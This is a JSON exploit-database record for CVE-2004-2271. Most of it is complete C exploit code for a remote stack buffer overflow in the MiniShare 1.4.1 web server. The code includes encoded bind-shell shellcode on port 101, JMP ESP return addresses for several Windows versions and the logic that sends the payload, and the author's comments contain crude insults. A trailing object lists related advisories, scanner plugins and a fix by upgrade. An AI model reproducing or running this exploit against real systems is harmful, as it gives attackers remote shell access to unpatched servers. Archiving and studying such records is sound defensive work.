{"cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "cvelist": ["CVE-2004-2271"], "description": "MiniShare. CVE-2004-2271. Remote exploit for windows platform", "hash": "17f84951d5e2d3e806d61a412a938521690cd5c5730db8caa3ac04c00cc8dde7", "objectVersion": "1.0", "title": "MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit", "lastseen": "2016-01-31T12:33:00", "href": "https://www.exploit-db.com/exploits/616/", "viewCount": 7, "history": [], "modified": "2004-11-07T00:00:00", "bulletinFamily": "exploit", "osvdbidlist": ["11530"], "sourceData": "/*\r\n\r\n\r\n\r\nMiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1.\r\nBind a shellcode to the port 101.\r\n\r\nFull disclosure and exploit \r\nby class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet\r\n07 november 2004\r\n\r\nThanx to HDMoore and Metasploit.com for their kickass ASM work.\r\n\r\n\r\n------------------\r\nWHAT IS MINISHARE\r\n------------------\r\n\r\nHomepage - http://minishare.sourceforge.net/\r\n\t\r\n\tMiniShare is meant to serve anyone who has the need to share files to anyone,\r\n\tdoesn't have a place to store the files on the web, \r\n and does not want or simply does not have the skill\r\n\tand possibility to set up and maintain a complete HTTP-server software...\r\n\r\n--------------\r\nVULNERABILITY\r\n--------------\r\n\r\n\tA simple buffer overflow in the link length, nothing more\r\n\tread the code for further instructions.\r\n\r\n----\r\nFIX\r\n----\r\n\r\n\tActually none, the vendor is contacted the same day published, 1 hour before you.\r\n As a nice fuck to NGSS , iDEFENSE and all others private disclosures\r\n\thomo crew ainsi que K-OTiK, ki se tap' des keu dans leur \"Lab\"\r\n\tlol :->\r\n\r\n----\r\nEXTRA\r\n----\r\n \r\n\tUpdate the JMP ESP if you need. A wrong offset will crash minishare.\r\n\tCode tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English\r\n\tOthers MiniShare's versions aren't tested.\r\n Tip: If it crashes for you , try to play with Sleep()...\r\n\r\n----\r\nBY\r\n----\r\n\r\n class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet\r\n\t\t\t\t\t\t who\r\n\t\t\t\t\t\tgreets\r\n DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet\r\n\r\n*/\r\n\r\n\r\n\r\n\r\n#include \"winsock2.h\"\r\n#include \"fstream.h\"\r\n\r\n#pragma comment(lib, \"ws2_32\")\r\n\r\n\r\n\r\n\r\n//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore. \r\n\r\nchar scode[] =\r\n\"\\xEB\"\r\n\"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"\r\n\"\\xFF\\x60\\xDE\\x88\\x88\\x88\\xDB\\xDD\\xDE\\xDF\\x03\\xE4\\xAC\\x90\\x03\\xCD\\xB4\\x03\\xDC\\x8D\"\r\n\"\\xF0\\x89\\x62\\x03\\xC2\\x90\\x03\\xD2\\xA8\\x89\\x63\\x6B\\xBA\\xC1\\x03\\xBC\\x03\\x89\\x66\\xB9\"\r\n\"\\x77\\x74\\xB9\\x48\\x24\\xB0\\x68\\xFC\\x8F\\x49\\x47\\x85\\x89\\x4F\\x63\\x7A\\xB3\\xF4\\xAC\\x9C\"\r\n\"\\xFD\\x69\\x03\\xD2\\xAC\\x89\\x63\\xEE\\x03\\x84\\xC3\\x03\\xD2\\x94\\x89\\x63\\x03\\x8C\\x03\\x89\"\r\n\"\\x60\\x63\\x8A\\xB9\\x48\\xD7\\xD6\\xD5\\xD3\\x4A\\x80\\x88\\xD6\\xE2\\xB8\\xD1\\xEC\\x03\\x91\\x03\"\r\n\"\\xD3\\x84\\x03\\xD3\\x94\\x03\\x93\\x03\\xD3\\x80\\xDB\\xE0\\x06\\xC6\\x86\\x64\\x77\\x5E\\x01\\x4F\"\r\n\"\\x09\\x64\\x88\\x89\\x88\\x88\\xDF\\xDE\\xDB\\x01\\x6D\\x60\\xAF\\x88\\x88\\x88\\x18\\x89\\x88\\x88\"\r\n\"\\x3E\\x91\\x90\\x6F\\x2C\\x91\\xF8\\x61\\x6D\\xC1\\x0E\\xC1\\x2C\\x92\\xF8\\x4F\\x2C\\x25\\xA6\\x61\"\r\n\"\\x51\\x81\\x7D\\x25\\x43\\x65\\x74\\xB3\\xDF\\xDB\\xBA\\xD7\\xBB\\xBA\\x88\\xD3\\x05\\xC3\\xA8\\xD9\"\r\n\"\\x77\\x5F\\x01\\x57\\x01\\x4B\\x05\\xFD\\x9C\\xE2\\x8F\\xD1\\xD9\\xDB\\x77\\xBC\\x07\\x77\\xDD\\x8C\"\r\n\"\\xD1\\x01\\x8C\\x06\\x6A\\x7A\\xA3\\xAF\\xDC\\x77\\xBF\\x77\\xDD\\xB8\\xB9\\x48\\xD8\\xD8\\xD8\\xD8\"\r\n\"\\xC8\\xD8\\xC8\\xD8\\x77\\xDD\\xA4\\x01\\x4F\\xB9\\x53\\xDB\\xDB\\xE0\\x8A\\x88\\x88\\xED\\x01\\x68\"\r\n\"\\xE2\\x98\\xD8\\xDF\\x77\\xDD\\xAC\\xDB\\xDF\\x77\\xDD\\xA0\\xDB\\xDC\\xDF\\x77\\xDD\\xA8\\x01\\x4F\"\r\n\"\\xE0\\xCB\\xC5\\xCC\\x88\\x01\\x6B\\x0F\\x72\\xB9\\x48\\x05\\xF4\\xAC\\x24\\xE2\\x9D\\xD1\\x7B\\x23\"\r\n\"\\x0F\\x72\\x09\\x64\\xDC\\x88\\x88\\x88\\x4E\\xCC\\xAC\\x98\\xCC\\xEE\\x4F\\xCC\\xAC\\xB4\\x89\\x89\"\r\n\"\\x01\\xF4\\xAC\\xC0\\x01\\xF4\\xAC\\xC4\\x01\\xF4\\xAC\\xD8\\x05\\xCC\\xAC\\x98\\xDC\\xD8\\xD9\\xD9\"\r\n\"\\xD9\\xC9\\xD9\\xC1\\xD9\\xD9\\xDB\\xD9\\x77\\xFD\\x88\\xE0\\xFA\\x76\\x3B\\x9E\\x77\\xDD\\x8C\\x77\"\r\n\"\\x58\\x01\\x6E\\x77\\xFD\\x88\\xE0\\x25\\x51\\x8D\\x46\\x77\\xDD\\x8C\\x01\\x4B\\xE0\\x77\\x77\\x77\"\r\n\"\\x77\\x77\\xBE\\x77\\x5B\\x77\\xFD\\x88\\xE0\\xF6\\x50\\x6A\\xFB\\x77\\xDD\\x8C\\xB9\\x53\\xDB\\x77\"\r\n\"\\x58\\x68\\x61\\x63\\x6B\\x90\";\r\n\r\n/*\r\n\r\n//116 bytes, execute regedit.exe, XORed 0x88, hardcoded WinXP SP1 English\r\n\r\nchar scode+[] =\r\n\"\\xEB\"\r\n\"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"\r\n\"\\xFF\\xDD\\x01\\x6D\\x09\\x64\\xC4\\x88\\x88\\x88\\xDB\\x05\\xF5\\x3C\\x4E\\xCD\\x7C\\xFA\\x4E\\xCD\"\r\n\"\\x7D\\xED\\x4E\\xCD\\x7E\\xEF\\x4E\\xCD\\x7F\\xED\\x4E\\xCD\\x70\\xEC\\x4E\\xCD\\x71\\xE1\\x4E\\xCD\"\r\n\"\\x72\\xFC\\x4E\\xCD\\x73\\xA6\\x4E\\xCD\\x74\\xED\\x4E\\xCD\\x75\\xF0\\x4E\\xCD\\x76\\xED\\x4E\\xCD\"\r\n\"\\x77\\x88\\xE0\\x8D\\x88\\x88\\x88\\x05\\xCD\\x7C\\xD8\\x30\\xE8\\x75\\x6E\\xFF\\x77\\x58\\xE0\\x89\"\r\n\"\\x88\\x88\\x88\\x30\\xEB\\x10\\x6F\\xFF\\x77\\x58\\x68\\x61\\x63\\x6B\\x90\";\r\n\r\n//565 bytes, execute regedit.exe, alphanumeric, hardcoded WinXP SP1 English\r\n\r\nchar scode+[]=\r\n\"LLLLYhbSgCX5bSgCHQVPPTQPPaRVVUSBRDJfh2ADTY09VQa0tkafhXMfXf1Dkbf1TkbjgY0Lkd0TkdfhH\"\r\n\"CfYf1LkfjiY0Lkh0tkjjOX0Dkkf1TkljxY0Lko0Tko0TkqjfY0Lks0tks0Tkuj1Y0Lkw0tkw0tkyCjyY0\"\r\n\"Lkz0TkzCC0tkzCCjmY0Lkz0TkzCC0TkzCCjhX0Dkz0tkzCC0tkzCCjPX0Dkz0TkzCC0tkzCCjfY0Lkz0T\"\r\n\"kzCjjX0DkzC0TkzCCjeX0Dkz0tkzCC0TkzCCjvX0Dkz0tkzCC0TkzCCj3X0Dkz0tkzCC0tkzCCjOX0Dkz\"\r\n\"0tkzCjaX0DkzCChuucTX1DkzCCCC0tkzCCjaY0Lkz0TkzCC0tkzCjRY0LkzCfhNUfXf1Dkzf1TkzCCCfh\"\r\n\"hhfYf1Lkzf1TkzCCChS4ciX1DkzCCCC0TkzCC0tkzCjKY0Lkz0TkzCCfhzhfXf1Dkzf1TkzUvB3tLHCiS\"\r\n\"r2K9Esr9Ele9E8g9Eqe9Ejd9Eni9EUt9EbD9Efe9Etx9E2e9EOahpucTrEjPG2LLwhGhR4ciGcgSwzG\";\r\n\r\n*/\r\n\r\nstatic char payload[5000];\r\n\r\nchar espxp1en[]=\"\\x33\\x55\\xdc\\x77\"; //JMP ESP - user32.dll - WinXP SP1 English\r\nchar esp2k4en[]=\"\\xb8\\x9e\\xe3\\x77\"; //JMP ESP - user32.dll - Win2k SP4 English\r\nchar espnt6en[]=\"\\xf8\\x29\\xf3\\x77\"; //JMP ESP - kernel32.dll - WinNT SP6 English\r\n\r\nvoid usage(char* us);\r\nWSADATA wsadata;\r\nvoid ver();\r\n\r\nint main(int argc,char *argv[])\r\n{\r\n\tver();\r\n\tif ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;}\r\n\tif (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<\"[+] wsastartup error: \"<<WSAGetLastError()<<endl;return -1;}\r\n\tint ip=htonl(inet_addr(argv[2])), sz, port, sizeA, sizeB, sizeC, a, b, c;\r\n\tchar *target, *os;\r\n\tif (argc==4){port=atoi(argv[3]);}\r\n\telse port=80;\r\n\tif (atoi(argv[1]) == 1){target=espxp1en;os=\"WinXP SP1 English\";}\r\n\tif (atoi(argv[1]) == 2){target=esp2k4en;os=\"Win2k SP4 English\";}\r\n\tif (atoi(argv[1]) == 3){target=espnt6en;os=\"WinNT SP6 English\";}\r\n\tSOCKET s;\r\n\tstruct fd_set mask;\r\n\tstruct timeval timeout; \r\n\tstruct sockaddr_in server;\r\n\ts=socket(AF_INET,SOCK_STREAM,0);\r\n\tif (s==INVALID_SOCKET){ cout<<\"[+] socket() error: \"<<WSAGetLastError()<<endl;WSACleanup();return -1;}\r\n\tcout<<\"[+] target: \"<<os<<endl;\t\t\t\r\n\tserver.sin_family=AF_INET;\r\n\tserver.sin_addr.s_addr=htonl(ip);\r\n\tserver.sin_port=htons(port);\r\n\tWSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);\r\n\ttimeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);\r\n\tswitch(select(s+1,NULL,&mask,NULL,&timeout))\r\n\t{\r\n\t\tcase -1: {cout<<\"[+] select() error: \"<<WSAGetLastError()<<endl;closesocket(s);return -1;}\r\n\t\tcase 0: {cout<<\"[+] connection failed.\"<<endl;closesocket(s);return -1;}\r\n\t\tdefault:\r\n\t\tif(FD_ISSET(s,&mask))\r\n\t\t{\r\n\t\t\tcout<<\"[+] connected, constructing the payload...\"<<endl;\r\n\t\t\tSleep(1000);\r\n\t\t\tsizeA=1787;\r\n\t\t\tsizeB=414-sizeof(scode);\r\n\t\t\tsizeC=10;\r\n\t\t\tsz=sizeA+sizeB+sizeC+sizeof(scode)+17;\r\n\t\t\tmemset(payload,0,sizeof(payload));\r\n\t\t\tstrcat(payload,\"GET \");\r\n\t\t\tfor (a=0;a<sizeA;a++){strcat(payload,\"\\x41\");}\r\n\t\t\tstrcat(payload,target);\r\n\t\t\tfor (b=0;b<sizeB;b++){strcat(payload,\"\\x41\");}\r\n\t\t\tstrcat(payload,scode);\r\n\t\t\tfor (c=0;c<sizeC;c++){strcat(payload,\"\\x41\");}\r\n\t\t\tstrcat(payload,\" HTTP/1.1\\r\\n\\r\\n\");\r\n\t\t\tSleep(1000);\r\n\t\t if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<\"[+] sending error, the server prolly rebooted.\"<<endl;return -1;}\r\n\t\t\tSleep(1000);\r\n\t\t\tcout<<\"[+] size of payload: \"<<sz<<endl;\t\t\t\r\n\t\t\tcout<<\"[+] payload send, connect the port 101 to get a shell.\"<<endl;\r\n\t\t\treturn 0;\r\n\t\t}\r\n\t}\r\n\tclosesocket(s);\r\n\tWSACleanup();\r\n\treturn 0;\r\n}\r\n\r\n\r\nvoid usage(char* us) \r\n{ \r\n\tcout<<\"USAGE: 101_mini.exe Target Ip Port\\n\"<<endl;\r\n\tcout<<\"TARGETS: \"<<endl;\r\n\tcout<<\" [+] 1. WinXP SP1 English (*)\"<<endl;\r\n\tcout<<\" [+] 2. Win2k SP4 English (*)\"<<endl;\r\n\tcout<<\" [+] 3. WinNT SP6 English (*)\"<<endl;\r\n\tcout<<\"NOTE: \"<<endl;\r\n\tcout<<\" The port 80 is default if no port specified\"<<endl;\r\n\tcout<<\" The exploit bind a shellcode to the port 101\"<<endl;\r\n\tcout<<\" A wildcard (*) mean Tested.\"<<endl;\r\n\treturn;\r\n} \r\n\r\nvoid ver()\r\n{\t\r\ncout<<endl;\r\ncout<<\" \"<<endl;\r\ncout<<\" ===================================================[v0.1]====\"<<endl;\r\ncout<<\" ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1=====\"<<endl; \r\ncout<<\" =============Remote Buffer Overflow Exploit==================\"<<endl;\r\ncout<<\" ====coded by class101===========[DFind.kd-team.com 2004]=====\"<<endl;\r\ncout<<\" =============================================================\"<<endl;\r\ncout<<\" \"<<endl;\r\n}\r\n\r\n// milw0rm.com [2004-11-07]\r\n", "edition": 1, "id": "EDB-ID:616", "references": [], "reporter": "class101", "type": "exploitdb", "published": "2004-11-07T00:00:00", "sourceHref": "https://www.exploit-db.com/download/616/", "enchantments": {"vulnersScore": 9.0}}

{"result": {"cve": [{"id": "CVE-2004-2271", "type": "cve", "title": "CVE-2004-2271", "description": "Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.", "published": "2004-12-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2271", "cvelist": ["CVE-2004-2271"], "lastseen": "2016-09-03T04:49:34"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/HTTP/MINISHARE_GET_OVERFLOW", "type": "metasploit", "title": "CVE-2004-2271 Minishare 1.4.1 Buffer Overflow ", "description": "This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack buffer overflow that requires a \"jmp esp\" to reach the payload, making this difficult to target many platforms at once. This module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.", "published": "2005-12-26T14:34:22", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/http/minishare_get_overflow", "cvelist": ["CVE-2004-2271"], "lastseen": "2017-06-05T14:18:08"}], "exploitdb": [{"id": "EDB-ID:636", "type": "exploitdb", "title": "MiniShare 1.4.1 - Remote Buffer Overflow Exploit", "description": "MiniShare Remote Buffer Overflow Exploit (c source). CVE-2004-2271. Remote exploit for windows platform", "published": "2004-11-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/636/", "cvelist": ["CVE-2004-2271"], "lastseen": "2016-01-31T12:35:05"}, {"id": "EDB-ID:16754", "type": "exploitdb", "title": "Minishare 1.4.1 - Buffer Overflow", "description": "Minishare 1.4.1 Buffer Overflow. CVE-2004-2271. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16754/", "cvelist": ["CVE-2004-2271"], "lastseen": "2016-02-02T06:26:29"}], "seebug": [{"id": "SSV-62903", "type": "seebug", "title": "MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit", "description": "Summary: \n \nMiniShare is a file sharing system.< br/>MiniShare on the ultra-long URL request processing is incorrect, a remote attacker could exploit this vulnerability to service program for a buffer overflow, it is possible to process permissions to execute arbitrary instructions.< br/>the attacker submitted a long HTTP GET request, generating a buffer overflow, dedicated to building the submitted data may be in the process of permission to execute any command.< br/>\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-62903", "cvelist": ["CVE-2004-2271"], "lastseen": "2016-07-29T19:03:42"}, {"id": "SSV-71259", "type": "seebug", "title": "Minishare 1.4.1 - Buffer Overflow", "description": "Summary: \n \nMiniShare is a file sharing system.< br/>MiniShare on the ultra-long URL request processing is incorrect, a remote attacker could exploit this vulnerability to service program for a buffer overflow, it is possible to process permissions to execute arbitrary instructions.< br/>the attacker submitted a long HTTP GET request, generating a buffer overflow, dedicated to building the submitted data may be in the process of permission to execute any command.< br/>\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-71259", "cvelist": ["CVE-2004-2271"], "lastseen": "2016-07-28T03:00:33"}], "osvdb": [{"id": "OSVDB:11530", "type": "osvdb", "title": "MiniShare HTTP GET Request Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in MiniShare. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted HTTP GET request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.4.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in MiniShare. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted HTTP GET request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://minishare.sourceforge.net\nSecurity Tracker: 1012106\n[Secunia Advisory ID:13114](https://secuniaresearch.flexerasoftware.com/advisories/13114/)\nOther Advisory URL: http://www.securiteam.com/exploits/6X00B1PBPC.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html\nISS X-Force ID: 17978\n[CVE-2004-2271](https://vulners.com/cve/CVE-2004-2271)\nBugtraq ID: 11620\n", "published": "2004-11-07T11:40:13", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:11530", "cvelist": ["CVE-2004-2271"], "lastseen": "2017-04-28T13:20:07"}], "packetstorm": [{"id": "PACKETSTORM:82959", "type": "packetstorm", "title": "Minishare 1.4.1 Buffer Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/82959/Minishare-1.4.1-Buffer-Overflow.html", "cvelist": ["CVE-2004-2271"], "lastseen": "2016-12-05T22:12:06"}], "nessus": [{"id": "MINISHARE_OVERFLOW.NASL", "type": "nessus", "title": "MiniShare Webserver HTTP GET Request Remote Overflow", "description": "MiniShare 1.4.1 and prior versions are affected by a buffer overflow flaw. A remote attacker could execute arbitrary commands by sending a specially crafted file name in a the GET request.\n\nVersion 1.3.4 and below do not seem to be vulnerable.", "published": "2005-06-06T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=18424", "cvelist": ["CVE-2004-2271"], "lastseen": "2016-11-29T05:32:19"}], "openvas": [{"id": "OPENVAS:18424", "type": "openvas", "title": "MiniShare webserver buffer overflow", "description": "MiniShare 1.4.1 and prior versions are affected by a buffer overflow flaw.\nA remote attacker could execute arbitrary commands by sending a specially\ncrafted file name in a the GET request.\n\nVersion 1.3.4 and below do not seem to be vulnerable.", "published": "2005-11-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=18424", "cvelist": ["CVE-2004-2271"], "lastseen": "2017-05-18T06:38:33"}]}}